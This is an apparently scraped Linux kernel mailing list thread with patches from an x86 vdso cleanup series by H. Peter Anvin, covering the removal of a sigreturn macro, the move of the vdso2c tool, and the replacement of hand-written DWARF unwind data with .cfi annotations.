arch/x86/entry/vdso/vdso32/system_call.S | 22 ++-
arch/x86/entry/vdso/vdso32/vclock_gettime.c | 5 +-
arch/x86/entry/vdso/vdso32/vdso32.lds.S | 2 +-
arch/x86/entry/vdso/vdso32/vgetcpu.c | 4 +-
arch/x86/entry/vdso/vdso64/Makefile | 46 ++++++
arch/x86/entry/vdso/vdso64/note.S | 1 +
arch/x86/entry/vdso/vdso64/vclock_gettime.c | 1 +
.../entry/vdso/{vdso.lds.S => vdso64/vdso64.lds.S} | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vdsox32.lds.S | 2 +-
arch/x86/entry/vdso/vdso64/vgetcpu.c | 1 +
.../entry/vdso/{ => vdso64}/vgetrandom-chacha.S | 0
arch/x86/entry/vdso/{ => vdso64}/vgetrandom.c | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vsgx.S | 0
arch/x86/entry/vdso/vma.c | 24 ++-
arch/x86/include/asm/cpufeatures.h | 2 +-
arch/x86/include/asm/dwarf2.h | 1 +
arch/x86/include/asm/elf.h | 2 +-
arch/x86/include/asm/vdso.h | 6 +-
arch/x86/include/asm/vdso/gettimeofday.h | 108 +-------------
arch/x86/include/asm/vdso/sys_call.h | 105 +++++++++++++
arch/x86/kernel/asm-offsets.c | 6 +
arch/x86/kernel/cpu/centaur.c | 3 -
arch/x86/kernel/cpu/common.c | 8 +
arch/x86/kernel/cpu/intel.c | 4 +-
arch/x86/kernel/cpu/zhaoxin.c | 4 +-
arch/x86/kernel/fred.c | 2 +-
arch/x86/kernel/process_64.c | 6 +-
arch/x86/kernel/signal_32.c | 4 +-
arch/x86/tools/Makefile | 15 +-
arch/x86/{entry/vdso => tools}/vdso2c.c | 0
arch/x86/{entry/vdso => tools}/vdso2c.h | 0
arch/x86/xen/setup.c | 28 ++--
arch/x86/xen/smp_pv.c | 5 +-
arch/x86/xen/xen-ops.h | 1 -
47 files changed, 444 insertions(+), 490 deletions(-)
|
A macro SYSCALL_ENTER_KERNEL was defined in sigreturn.S, with the
ability of overriding it. The override capability, however, is not
used anywhere, and the macro name is potentially confusing because it
seems to imply that sysenter/syscall could be used here, which is NOT
true: the sigreturn system calls MUST use int $0x80.
Signed-off-by: H. Peter Anvin (Intel) <hpa@zytor.com>
---
arch/x86/entry/vdso/vdso32/sigreturn.S | 8 ++------
1 file changed, 2 insertions(+), 6 deletions(-)
diff --git a/arch/x86/entry/vdso/vdso32/sigreturn.S b/arch/x86/entry/vdso/vdso32/sigreturn.S
index 1bd068f72d4c..965900c6763b 100644
--- a/arch/x86/entry/vdso/vdso32/sigreturn.S
+++ b/arch/x86/entry/vdso/vdso32/sigreturn.S
@@ -3,10 +3,6 @@
#include <asm/unistd_32.h>
#include <asm/asm-offsets.h>
-#ifndef SYSCALL_ENTER_KERNEL
-#define SYSCALL_ENTER_KERNEL int $0x80
-#endif
-
.text
.globl __kernel_sigreturn
.type __kernel_sigreturn,@function
@@ -16,7 +12,7 @@ __kernel_sigreturn:
.LSTART_sigreturn:
popl %eax /* XXX does this mean it needs unwind info? */
movl $__NR_sigreturn, %eax
- SYSCALL_ENTER_KERNEL
+ int $0x80
.LEND_sigreturn:
SYM_INNER_LABEL(vdso32_sigreturn_landing_pad, SYM_L_GLOBAL)
nop
@@ -28,7 +24,7 @@ SYM_INNER_LABEL(vdso32_sigreturn_landing_pad, SYM_L_GLOBAL)
__kernel_rt_sigreturn:
.LSTART_rt_sigreturn:
movl $__NR_rt_sigreturn, %eax
- SYSCALL_ENTER_KERNEL
+ int $0x80
.LEND_rt_sigreturn:
SYM_INNER_LABEL(vdso32_rt_sigreturn_landing_pad, SYM_L_GLOBAL)
nop
--
2.52.0
|
{
"author": "\"H. Peter Anvin\" <hpa@zytor.com>",
"date": "Tue, 16 Dec 2025 13:25:59 -0800",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
This patchset cleans up the vdso build by building the 32- and 64-bit
vdsos in separate directories, moving the vdso2c tool to
arch/x86/tools, and by merging common code and especially Makefile
rules between the 32- and 64-bit vdsos to the greatest extent
possible.
Be more strict about sanitizing and standardizing the vdso build
options.
Disable CFI for the vdso until the kernel adds user space IBT support.
Modernize the DWARF generation vdso32/sigreturn.S.
Add macros to cleanly call system calls from vdso source code.
Add the GNU_PROPERTY and GNU_STACK PHDRs to the vdso.
When using int $0x80 (old 32-bit hardware or FRED-capable 64-bit
hardware) skip the stack stuff in the 32-bit kernel entry code and
call int $0x80 directly when used from C code.
Changes from v3 to v4:
- Improved description of patch 01/10.
- Split out the move of vdso2c to tools into a separate patch.
- Remove unrelated formatting changes from vdso-layout.lds.S.
- Fix *-x32.o being missing from "targets".
- Rebased onto v6.19-rc1.
Changes from v2 to v3:
In arch/x86/include/asm/vdso/sys_call.h:
- remove stray comment from prototyping (Uros Biszjak)
- remove VDSO_SYSCALL6() since it would require special
handling on 32 bits with frame pointers and is
currently unused. (Uros Biszjak)
- indent nested preprocessor directives.
Changes from v1 to v2:
Too many to count - much of the patchset has been reworked
Patches:
x86/entry/vdso: rename vdso_image_* to vdso*_image
x86/entry/vdso: move vdso2c to arch/x86/tools
x86/entry/vdso: refactor the vdso build
x86/entry/vdso32: don't rely on int80_landing_pad for adjusting ip
x86/entry/vdso32: remove SYSCALL_ENTER_KERNEL macro in sigreturn.S
x86/entry/vdso32: remove open-coded DWARF in sigreturn.S
x86/entry/vdso: include GNU_PROPERTY and GNU_STACK PHDRs
x86/vdso: abstract out vdso system call internals
x86/cpufeature: replace X86_FEATURE_SYSENTER32 with X86_FEATURE_SYSFAST32
x86/entry/vdso32: when using int $0x80, use it directly
---
arch/x86/Kconfig.cpufeatures | 8 +
arch/x86/Makefile | 2 +-
arch/x86/entry/syscall_32.c | 2 +-
arch/x86/entry/vdso/.gitignore | 11 +-
arch/x86/entry/vdso/Makefile | 162 +--------------------
arch/x86/entry/vdso/common/Makefile.include | 89 +++++++++++
arch/x86/entry/vdso/{vdso-note.S => common/note.S} | 5 +-
arch/x86/entry/vdso/{ => common}/vclock_gettime.c | 0
arch/x86/entry/vdso/{ => common}/vdso-layout.lds.S | 38 +++--
arch/x86/entry/vdso/{ => common}/vgetcpu.c | 0
arch/x86/entry/vdso/vdso32/Makefile | 24 +++
arch/x86/entry/vdso/vdso32/note.S | 19 +--
arch/x86/entry/vdso/vdso32/sigreturn.S | 152 +++++--------------
arch/x86/entry/vdso/vdso32/system_call.S | 22 ++-
arch/x86/entry/vdso/vdso32/vclock_gettime.c | 5 +-
arch/x86/entry/vdso/vdso32/vdso32.lds.S | 2 +-
arch/x86/entry/vdso/vdso32/vgetcpu.c | 4 +-
arch/x86/entry/vdso/vdso64/Makefile | 46 ++++++
arch/x86/entry/vdso/vdso64/note.S | 1 +
arch/x86/entry/vdso/vdso64/vclock_gettime.c | 1 +
.../entry/vdso/{vdso.lds.S => vdso64/vdso64.lds.S} | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vdsox32.lds.S | 2 +-
arch/x86/entry/vdso/vdso64/vgetcpu.c | 1 +
.../entry/vdso/{ => vdso64}/vgetrandom-chacha.S | 0
arch/x86/entry/vdso/{ => vdso64}/vgetrandom.c | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vsgx.S | 0
arch/x86/entry/vdso/vma.c | 24 ++-
arch/x86/include/asm/cpufeatures.h | 2 +-
arch/x86/include/asm/dwarf2.h | 1 +
arch/x86/include/asm/elf.h | 2 +-
arch/x86/include/asm/vdso.h | 6 +-
arch/x86/include/asm/vdso/gettimeofday.h | 108 +-------------
arch/x86/include/asm/vdso/sys_call.h | 105 +++++++++++++
arch/x86/kernel/asm-offsets.c | 6 +
arch/x86/kernel/cpu/centaur.c | 3 -
arch/x86/kernel/cpu/common.c | 8 +
arch/x86/kernel/cpu/intel.c | 4 +-
arch/x86/kernel/cpu/zhaoxin.c | 4 +-
arch/x86/kernel/fred.c | 2 +-
arch/x86/kernel/process_64.c | 6 +-
arch/x86/kernel/signal_32.c | 4 +-
arch/x86/tools/Makefile | 15 +-
arch/x86/{entry/vdso => tools}/vdso2c.c | 0
arch/x86/{entry/vdso => tools}/vdso2c.h | 0
arch/x86/xen/setup.c | 28 ++--
arch/x86/xen/smp_pv.c | 5 +-
arch/x86/xen/xen-ops.h | 1 -
47 files changed, 444 insertions(+), 490 deletions(-)
|
It is generally better to build tools in arch/x86/tools to keep host
cflags proliferation down, and to reduce makefile sequencing issues.
Move the vdso build tool vdso2c into arch/x86/tools in preparation for
refactoring the vdso makefiles.
Signed-off-by: H. Peter Anvin (Intel) <hpa@zytor.com>
---
arch/x86/Makefile | 2 +-
arch/x86/entry/vdso/Makefile | 7 +++----
arch/x86/tools/Makefile | 15 ++++++++++-----
arch/x86/{entry/vdso => tools}/vdso2c.c | 0
arch/x86/{entry/vdso => tools}/vdso2c.h | 0
5 files changed, 14 insertions(+), 10 deletions(-)
rename arch/x86/{entry/vdso => tools}/vdso2c.c (100%)
rename arch/x86/{entry/vdso => tools}/vdso2c.h (100%)
diff --git a/arch/x86/Makefile b/arch/x86/Makefile
index 1d403a3612ea..9ab7522ced18 100644
--- a/arch/x86/Makefile
+++ b/arch/x86/Makefile
@@ -252,7 +252,7 @@ endif
archscripts: scripts_basic
- $(Q)$(MAKE) $(build)=arch/x86/tools relocs
+ $(Q)$(MAKE) $(build)=arch/x86/tools relocs vdso2c
###
# Syscall table generation
diff --git a/arch/x86/entry/vdso/Makefile b/arch/x86/entry/vdso/Makefile
index 7f833026d5b2..3d9b09f00c70 100644
--- a/arch/x86/entry/vdso/Makefile
+++ b/arch/x86/entry/vdso/Makefile
@@ -38,13 +38,12 @@ VDSO_LDFLAGS_vdso.lds = -m elf_x86_64 -soname linux-vdso.so.1 \
$(obj)/vdso64.so.dbg: $(obj)/vdso.lds $(vobjs) FORCE
$(call if_changed,vdso_and_check)
-HOST_EXTRACFLAGS += -I$(srctree)/tools/include -I$(srctree)/include/uapi -I$(srctree)/arch/$(SUBARCH)/include/uapi
-hostprogs += vdso2c
+VDSO2C = $(objtree)/arch/x86/tools/vdso2c
quiet_cmd_vdso2c = VDSO2C $@
- cmd_vdso2c = $(obj)/vdso2c $< $(<:%.dbg=%) $@
+ cmd_vdso2c = $(VDSO2C) $< $(<:%.dbg=%) $@
-$(obj)/vdso%-image.c: $(obj)/vdso%.so.dbg $(obj)/vdso%.so $(obj)/vdso2c FORCE
+$(obj)/vdso%-image.c: $(obj)/vdso%.so.dbg $(obj)/vdso%.so $(VDSO2C) FORCE
$(call if_changed,vdso2c)
#
diff --git a/arch/x86/tools/Makefile b/arch/x86/tools/Makefile
index 7278e2545c35..39a183fffd04 100644
--- a/arch/x86/tools/Makefile
+++ b/arch/x86/tools/Makefile
@@ -38,9 +38,14 @@ $(obj)/insn_decoder_test.o: $(srctree)/tools/arch/x86/lib/insn.c $(srctree)/tool
$(obj)/insn_sanity.o: $(srctree)/tools/arch/x86/lib/insn.c $(srctree)/tools/arch/x86/lib/inat.c $(srctree)/tools/arch/x86/include/asm/inat_types.h $(srctree)/tools/arch/x86/include/asm/inat.h $(srctree)/tools/arch/x86/include/asm/insn.h $(objtree)/arch/x86/lib/inat-tables.c
-HOST_EXTRACFLAGS += -I$(srctree)/tools/include
-hostprogs += relocs
-relocs-objs := relocs_32.o relocs_64.o relocs_common.o
-PHONY += relocs
-relocs: $(obj)/relocs
+HOST_EXTRACFLAGS += -I$(srctree)/tools/include -I$(srctree)/include/uapi \
+ -I$(srctree)/arch/$(SUBARCH)/include/uapi
+
+hostprogs += relocs vdso2c
+relocs-objs := relocs_32.o relocs_64.o relocs_common.o
+
+always-y := $(hostprogs)
+
+PHONY += $(hostprogs)
+$(hostprogs): %: $(obj)/%
@:
diff --git a/arch/x86/entry/vdso/vdso2c.c b/arch/x86/tools/vdso2c.c
similarity index 100%
rename from arch/x86/entry/vdso/vdso2c.c
rename to arch/x86/tools/vdso2c.c
diff --git a/arch/x86/entry/vdso/vdso2c.h b/arch/x86/tools/vdso2c.h
similarity index 100%
rename from arch/x86/entry/vdso/vdso2c.h
rename to arch/x86/tools/vdso2c.h
--
2.52.0
|
{
"author": "\"H. Peter Anvin\" <hpa@zytor.com>",
"date": "Tue, 16 Dec 2025 13:25:56 -0800",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
This patchset cleans up the vdso build by building the 32- and 64-bit
vdsos in separate directories, moving the vdso2c tool to
arch/x86/tools, and by merging common code and especially Makefile
rules between the 32- and 64-bit vdsos to the greatest extent
possible.
Be more strict about sanitizing and standardizing the vdso build
options.
Disable CFI for the vdso until the kernel adds user space IBT support.
Modernize the DWARF generation vdso32/sigreturn.S.
Add macros to cleanly call system calls from vdso source code.
Add the GNU_PROPERTY and GNU_STACK PHDRs to the vdso.
When using int $0x80 (old 32-bit hardware or FRED-capable 64-bit
hardware) skip the stack stuff in the 32-bit kernel entry code and
call int $0x80 directly when used from C code.
Changes from v3 to v4:
- Improved description of patch 01/10.
- Split out the move of vdso2c to tools into a separate patch.
- Remove unrelated formatting changes from vdso-layout.lds.S.
- Fix *-x32.o being missing from "targets".
- Rebased onto v6.19-rc1.
Changes from v2 to v3:
In arch/x86/include/asm/vdso/sys_call.h:
- remove stray comment from prototyping (Uros Biszjak)
- remove VDSO_SYSCALL6() since it would require special
handling on 32 bits with frame pointers and is
currently unused. (Uros Biszjak)
- indent nested preprocessor directives.
Changes from v1 to v2:
Too many to count - much of the patchset has been reworked
Patches:
x86/entry/vdso: rename vdso_image_* to vdso*_image
x86/entry/vdso: move vdso2c to arch/x86/tools
x86/entry/vdso: refactor the vdso build
x86/entry/vdso32: don't rely on int80_landing_pad for adjusting ip
x86/entry/vdso32: remove SYSCALL_ENTER_KERNEL macro in sigreturn.S
x86/entry/vdso32: remove open-coded DWARF in sigreturn.S
x86/entry/vdso: include GNU_PROPERTY and GNU_STACK PHDRs
x86/vdso: abstract out vdso system call internals
x86/cpufeature: replace X86_FEATURE_SYSENTER32 with X86_FEATURE_SYSFAST32
x86/entry/vdso32: when using int $0x80, use it directly
---
arch/x86/Kconfig.cpufeatures | 8 +
arch/x86/Makefile | 2 +-
arch/x86/entry/syscall_32.c | 2 +-
arch/x86/entry/vdso/.gitignore | 11 +-
arch/x86/entry/vdso/Makefile | 162 +--------------------
arch/x86/entry/vdso/common/Makefile.include | 89 +++++++++++
arch/x86/entry/vdso/{vdso-note.S => common/note.S} | 5 +-
arch/x86/entry/vdso/{ => common}/vclock_gettime.c | 0
arch/x86/entry/vdso/{ => common}/vdso-layout.lds.S | 38 +++--
arch/x86/entry/vdso/{ => common}/vgetcpu.c | 0
arch/x86/entry/vdso/vdso32/Makefile | 24 +++
arch/x86/entry/vdso/vdso32/note.S | 19 +--
arch/x86/entry/vdso/vdso32/sigreturn.S | 152 +++++--------------
arch/x86/entry/vdso/vdso32/system_call.S | 22 ++-
arch/x86/entry/vdso/vdso32/vclock_gettime.c | 5 +-
arch/x86/entry/vdso/vdso32/vdso32.lds.S | 2 +-
arch/x86/entry/vdso/vdso32/vgetcpu.c | 4 +-
arch/x86/entry/vdso/vdso64/Makefile | 46 ++++++
arch/x86/entry/vdso/vdso64/note.S | 1 +
arch/x86/entry/vdso/vdso64/vclock_gettime.c | 1 +
.../entry/vdso/{vdso.lds.S => vdso64/vdso64.lds.S} | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vdsox32.lds.S | 2 +-
arch/x86/entry/vdso/vdso64/vgetcpu.c | 1 +
.../entry/vdso/{ => vdso64}/vgetrandom-chacha.S | 0
arch/x86/entry/vdso/{ => vdso64}/vgetrandom.c | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vsgx.S | 0
arch/x86/entry/vdso/vma.c | 24 ++-
arch/x86/include/asm/cpufeatures.h | 2 +-
arch/x86/include/asm/dwarf2.h | 1 +
arch/x86/include/asm/elf.h | 2 +-
arch/x86/include/asm/vdso.h | 6 +-
arch/x86/include/asm/vdso/gettimeofday.h | 108 +-------------
arch/x86/include/asm/vdso/sys_call.h | 105 +++++++++++++
arch/x86/kernel/asm-offsets.c | 6 +
arch/x86/kernel/cpu/centaur.c | 3 -
arch/x86/kernel/cpu/common.c | 8 +
arch/x86/kernel/cpu/intel.c | 4 +-
arch/x86/kernel/cpu/zhaoxin.c | 4 +-
arch/x86/kernel/fred.c | 2 +-
arch/x86/kernel/process_64.c | 6 +-
arch/x86/kernel/signal_32.c | 4 +-
arch/x86/tools/Makefile | 15 +-
arch/x86/{entry/vdso => tools}/vdso2c.c | 0
arch/x86/{entry/vdso => tools}/vdso2c.h | 0
arch/x86/xen/setup.c | 28 ++--
arch/x86/xen/smp_pv.c | 5 +-
arch/x86/xen/xen-ops.h | 1 -
47 files changed, 444 insertions(+), 490 deletions(-)
|
The vdso32 sigreturn.S contains open-coded DWARF bytecode, which
includes a hack for gdb to not try to step back to a previous call
instruction when backtracing from a signal handler.
Neither of those are necessary anymore: the backtracing issue is
handled by ".cfi_entry simple" and ".cfi_signal_frame", both of which
have been supported for a very long time now, which allows the
remaining frame to be built using regular .cfi annotations.
Add a few more register offsets to the signal frame just for good
measure.
Replace the nop on fallthrough of the system call (which should never,
ever happen) with a ud2a trap.
Signed-off-by: H. Peter Anvin (Intel) <hpa@zytor.com>
---
arch/x86/entry/vdso/vdso32/sigreturn.S | 146 ++++++-------------------
arch/x86/include/asm/dwarf2.h | 1 +
arch/x86/kernel/asm-offsets.c | 6 +
3 files changed, 39 insertions(+), 114 deletions(-)
diff --git a/arch/x86/entry/vdso/vdso32/sigreturn.S b/arch/x86/entry/vdso/vdso32/sigreturn.S
index 965900c6763b..25b0ac4b4bfe 100644
--- a/arch/x86/entry/vdso/vdso32/sigreturn.S
+++ b/arch/x86/entry/vdso/vdso32/sigreturn.S
@@ -1,136 +1,54 @@
/* SPDX-License-Identifier: GPL-2.0 */
#include <linux/linkage.h>
#include <asm/unistd_32.h>
+#include <asm/dwarf2.h>
#include <asm/asm-offsets.h>
+.macro STARTPROC_SIGNAL_FRAME sc
+ CFI_STARTPROC simple
+ CFI_SIGNAL_FRAME
+ /* -4 as pretcode has already been popped */
+ CFI_DEF_CFA esp, \sc - 4
+ CFI_OFFSET eip, IA32_SIGCONTEXT_ip
+ CFI_OFFSET eax, IA32_SIGCONTEXT_ax
+ CFI_OFFSET ebx, IA32_SIGCONTEXT_bx
+ CFI_OFFSET ecx, IA32_SIGCONTEXT_cx
+ CFI_OFFSET edx, IA32_SIGCONTEXT_dx
+ CFI_OFFSET esp, IA32_SIGCONTEXT_sp
+ CFI_OFFSET ebp, IA32_SIGCONTEXT_bp
+ CFI_OFFSET esi, IA32_SIGCONTEXT_si
+ CFI_OFFSET edi, IA32_SIGCONTEXT_di
+ CFI_OFFSET es, IA32_SIGCONTEXT_es
+ CFI_OFFSET cs, IA32_SIGCONTEXT_cs
+ CFI_OFFSET ss, IA32_SIGCONTEXT_ss
+ CFI_OFFSET ds, IA32_SIGCONTEXT_ds
+ CFI_OFFSET eflags, IA32_SIGCONTEXT_flags
+.endm
+
.text
.globl __kernel_sigreturn
.type __kernel_sigreturn,@function
- nop /* this guy is needed for .LSTARTFDEDLSI1 below (watch for HACK) */
ALIGN
__kernel_sigreturn:
-.LSTART_sigreturn:
- popl %eax /* XXX does this mean it needs unwind info? */
+ STARTPROC_SIGNAL_FRAME IA32_SIGFRAME_sigcontext
+ popl %eax
+ CFI_ADJUST_CFA_OFFSET -4
movl $__NR_sigreturn, %eax
int $0x80
-.LEND_sigreturn:
SYM_INNER_LABEL(vdso32_sigreturn_landing_pad, SYM_L_GLOBAL)
- nop
- .size __kernel_sigreturn,.-.LSTART_sigreturn
+ ud2a
+ CFI_ENDPROC
+ .size __kernel_sigreturn,.-__kernel_sigreturn
.globl __kernel_rt_sigreturn
.type __kernel_rt_sigreturn,@function
ALIGN
__kernel_rt_sigreturn:
-.LSTART_rt_sigreturn:
+ STARTPROC_SIGNAL_FRAME IA32_RT_SIGFRAME_sigcontext
movl $__NR_rt_sigreturn, %eax
int $0x80
-.LEND_rt_sigreturn:
SYM_INNER_LABEL(vdso32_rt_sigreturn_landing_pad, SYM_L_GLOBAL)
- nop
- .size __kernel_rt_sigreturn,.-.LSTART_rt_sigreturn
- .previous
-
- .section .eh_frame,"a",@progbits
-.LSTARTFRAMEDLSI1:
- .long .LENDCIEDLSI1-.LSTARTCIEDLSI1
-.LSTARTCIEDLSI1:
- .long 0 /* CIE ID */
- .byte 1 /* Version number */
- .string "zRS" /* NUL-terminated augmentation string */
- .uleb128 1 /* Code alignment factor */
- .sleb128 -4 /* Data alignment factor */
- .byte 8 /* Return address register column */
- .uleb128 1 /* Augmentation value length */
- .byte 0x1b /* DW_EH_PE_pcrel|DW_EH_PE_sdata4. */
- .byte 0 /* DW_CFA_nop */
- .align 4
-.LENDCIEDLSI1:
- .long .LENDFDEDLSI1-.LSTARTFDEDLSI1 /* Length FDE */
-.LSTARTFDEDLSI1:
- .long .LSTARTFDEDLSI1-.LSTARTFRAMEDLSI1 /* CIE pointer */
- /* HACK: The dwarf2 unwind routines will subtract 1 from the
- return address to get an address in the middle of the
- presumed call instruction. Since we didn't get here via
- a call, we need to include the nop before the real start
- to make up for it. */
- .long .LSTART_sigreturn-1-. /* PC-relative start address */
- .long .LEND_sigreturn-.LSTART_sigreturn+1
- .uleb128 0 /* Augmentation */
- /* What follows are the instructions for the table generation.
- We record the locations of each register saved. This is
- complicated by the fact that the "CFA" is always assumed to
- be the value of the stack pointer in the caller. This means
- that we must define the CFA of this body of code to be the
- saved value of the stack pointer in the sigcontext. Which
- also means that there is no fixed relation to the other
- saved registers, which means that we must use DW_CFA_expression
- to compute their addresses. It also means that when we
- adjust the stack with the popl, we have to do it all over again. */
-
-#define do_cfa_expr(offset) \
- .byte 0x0f; /* DW_CFA_def_cfa_expression */ \
- .uleb128 1f-0f; /* length */ \
-0: .byte 0x74; /* DW_OP_breg4 */ \
- .sleb128 offset; /* offset */ \
- .byte 0x06; /* DW_OP_deref */ \
-1:
-
-#define do_expr(regno, offset) \
- .byte 0x10; /* DW_CFA_expression */ \
- .uleb128 regno; /* regno */ \
- .uleb128 1f-0f; /* length */ \
-0: .byte 0x74; /* DW_OP_breg4 */ \
- .sleb128 offset; /* offset */ \
-1:
-
- do_cfa_expr(IA32_SIGCONTEXT_sp+4)
- do_expr(0, IA32_SIGCONTEXT_ax+4)
- do_expr(1, IA32_SIGCONTEXT_cx+4)
- do_expr(2, IA32_SIGCONTEXT_dx+4)
- do_expr(3, IA32_SIGCONTEXT_bx+4)
- do_expr(5, IA32_SIGCONTEXT_bp+4)
- do_expr(6, IA32_SIGCONTEXT_si+4)
- do_expr(7, IA32_SIGCONTEXT_di+4)
- do_expr(8, IA32_SIGCONTEXT_ip+4)
-
- .byte 0x42 /* DW_CFA_advance_loc 2 -- nop; popl eax. */
-
- do_cfa_expr(IA32_SIGCONTEXT_sp)
- do_expr(0, IA32_SIGCONTEXT_ax)
- do_expr(1, IA32_SIGCONTEXT_cx)
- do_expr(2, IA32_SIGCONTEXT_dx)
- do_expr(3, IA32_SIGCONTEXT_bx)
- do_expr(5, IA32_SIGCONTEXT_bp)
- do_expr(6, IA32_SIGCONTEXT_si)
- do_expr(7, IA32_SIGCONTEXT_di)
- do_expr(8, IA32_SIGCONTEXT_ip)
-
- .align 4
-.LENDFDEDLSI1:
-
- .long .LENDFDEDLSI2-.LSTARTFDEDLSI2 /* Length FDE */
-.LSTARTFDEDLSI2:
- .long .LSTARTFDEDLSI2-.LSTARTFRAMEDLSI1 /* CIE pointer */
- /* HACK: See above wrt unwind library assumptions. */
- .long .LSTART_rt_sigreturn-1-. /* PC-relative start address */
- .long .LEND_rt_sigreturn-.LSTART_rt_sigreturn+1
- .uleb128 0 /* Augmentation */
- /* What follows are the instructions for the table generation.
- We record the locations of each register saved. This is
- slightly less complicated than the above, since we don't
- modify the stack pointer in the process. */
-
- do_cfa_expr(IA32_RT_SIGFRAME_sigcontext-4 + IA32_SIGCONTEXT_sp)
- do_expr(0, IA32_RT_SIGFRAME_sigcontext-4 + IA32_SIGCONTEXT_ax)
- do_expr(1, IA32_RT_SIGFRAME_sigcontext-4 + IA32_SIGCONTEXT_cx)
- do_expr(2, IA32_RT_SIGFRAME_sigcontext-4 + IA32_SIGCONTEXT_dx)
- do_expr(3, IA32_RT_SIGFRAME_sigcontext-4 + IA32_SIGCONTEXT_bx)
- do_expr(5, IA32_RT_SIGFRAME_sigcontext-4 + IA32_SIGCONTEXT_bp)
- do_expr(6, IA32_RT_SIGFRAME_sigcontext-4 + IA32_SIGCONTEXT_si)
- do_expr(7, IA32_RT_SIGFRAME_sigcontext-4 + IA32_SIGCONTEXT_di)
- do_expr(8, IA32_RT_SIGFRAME_sigcontext-4 + IA32_SIGCONTEXT_ip)
-
- .align 4
-.LENDFDEDLSI2:
+ ud2a
+ CFI_ENDPROC
+ .size __kernel_rt_sigreturn,.-__kernel_rt_sigreturn
.previous
diff --git a/arch/x86/include/asm/dwarf2.h b/arch/x86/include/asm/dwarf2.h
index 302e11b15da8..09c9684d3ad6 100644
--- a/arch/x86/include/asm/dwarf2.h
+++ b/arch/x86/include/asm/dwarf2.h
@@ -20,6 +20,7 @@
#define CFI_RESTORE_STATE .cfi_restore_state
#define CFI_UNDEFINED .cfi_undefined
#define CFI_ESCAPE .cfi_escape
+#define CFI_SIGNAL_FRAME .cfi_signal_frame
#ifndef BUILD_VDSO
/*
diff --git a/arch/x86/kernel/asm-offsets.c b/arch/x86/kernel/asm-offsets.c
index 25fcde525c68..081816888f7a 100644
--- a/arch/x86/kernel/asm-offsets.c
+++ b/arch/x86/kernel/asm-offsets.c
@@ -63,8 +63,14 @@ static void __used common(void)
OFFSET(IA32_SIGCONTEXT_bp, sigcontext_32, bp);
OFFSET(IA32_SIGCONTEXT_sp, sigcontext_32, sp);
OFFSET(IA32_SIGCONTEXT_ip, sigcontext_32, ip);
+ OFFSET(IA32_SIGCONTEXT_es, sigcontext_32, es);
+ OFFSET(IA32_SIGCONTEXT_cs, sigcontext_32, cs);
+ OFFSET(IA32_SIGCONTEXT_ss, sigcontext_32, ss);
+ OFFSET(IA32_SIGCONTEXT_ds, sigcontext_32, ds);
+ OFFSET(IA32_SIGCONTEXT_flags, sigcontext_32, flags);
BLANK();
+ OFFSET(IA32_SIGFRAME_sigcontext, sigframe_ia32, sc);
OFFSET(IA32_RT_SIGFRAME_sigcontext, rt_sigframe_ia32, uc.uc_mcontext);
#endif
--
2.52.0
|
{
"author": "\"H. Peter Anvin\" <hpa@zytor.com>",
"date": "Tue, 16 Dec 2025 13:26:00 -0800",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
This patchset cleans up the vdso build by building the 32- and 64-bit
vdsos in separate directories, moving the vdso2c tool to
arch/x86/tools, and by merging common code and especially Makefile
rules between the 32- and 64-bit vdsos to the greatest extent
possible.
Be more strict about sanitizing and standardizing the vdso build
options.
Disable CFI for the vdso until the kernel adds user space IBT support.
Modernize the DWARF generation vdso32/sigreturn.S.
Add macros to cleanly call system calls from vdso source code.
Add the GNU_PROPERTY and GNU_STACK PHDRs to the vdso.
When using int $0x80 (old 32-bit hardware or FRED-capable 64-bit
hardware) skip the stack stuff in the 32-bit kernel entry code and
call int $0x80 directly when used from C code.
Changes from v3 to v4:
- Improved description of patch 01/10.
- Split out the move of vdso2c to tools into a separate patch.
- Remove unrelated formatting changes from vdso-layout.lds.S.
- Fix *-x32.o being missing from "targets".
- Rebased onto v6.19-rc1.
Changes from v2 to v3:
In arch/x86/include/asm/vdso/sys_call.h:
- remove stray comment from prototyping (Uros Biszjak)
- remove VDSO_SYSCALL6() since it would require special
handling on 32 bits with frame pointers and is
currently unused. (Uros Biszjak)
- indent nested preprocessor directives.
Changes from v1 to v2:
Too many to count - much of the patchset has been reworked
Patches:
x86/entry/vdso: rename vdso_image_* to vdso*_image
x86/entry/vdso: move vdso2c to arch/x86/tools
x86/entry/vdso: refactor the vdso build
x86/entry/vdso32: don't rely on int80_landing_pad for adjusting ip
x86/entry/vdso32: remove SYSCALL_ENTER_KERNEL macro in sigreturn.S
x86/entry/vdso32: remove open-coded DWARF in sigreturn.S
x86/entry/vdso: include GNU_PROPERTY and GNU_STACK PHDRs
x86/vdso: abstract out vdso system call internals
x86/cpufeature: replace X86_FEATURE_SYSENTER32 with X86_FEATURE_SYSFAST32
x86/entry/vdso32: when using int $0x80, use it directly
---
arch/x86/Kconfig.cpufeatures | 8 +
arch/x86/Makefile | 2 +-
arch/x86/entry/syscall_32.c | 2 +-
arch/x86/entry/vdso/.gitignore | 11 +-
arch/x86/entry/vdso/Makefile | 162 +--------------------
arch/x86/entry/vdso/common/Makefile.include | 89 +++++++++++
arch/x86/entry/vdso/{vdso-note.S => common/note.S} | 5 +-
arch/x86/entry/vdso/{ => common}/vclock_gettime.c | 0
arch/x86/entry/vdso/{ => common}/vdso-layout.lds.S | 38 +++--
arch/x86/entry/vdso/{ => common}/vgetcpu.c | 0
arch/x86/entry/vdso/vdso32/Makefile | 24 +++
arch/x86/entry/vdso/vdso32/note.S | 19 +--
arch/x86/entry/vdso/vdso32/sigreturn.S | 152 +++++--------------
arch/x86/entry/vdso/vdso32/system_call.S | 22 ++-
arch/x86/entry/vdso/vdso32/vclock_gettime.c | 5 +-
arch/x86/entry/vdso/vdso32/vdso32.lds.S | 2 +-
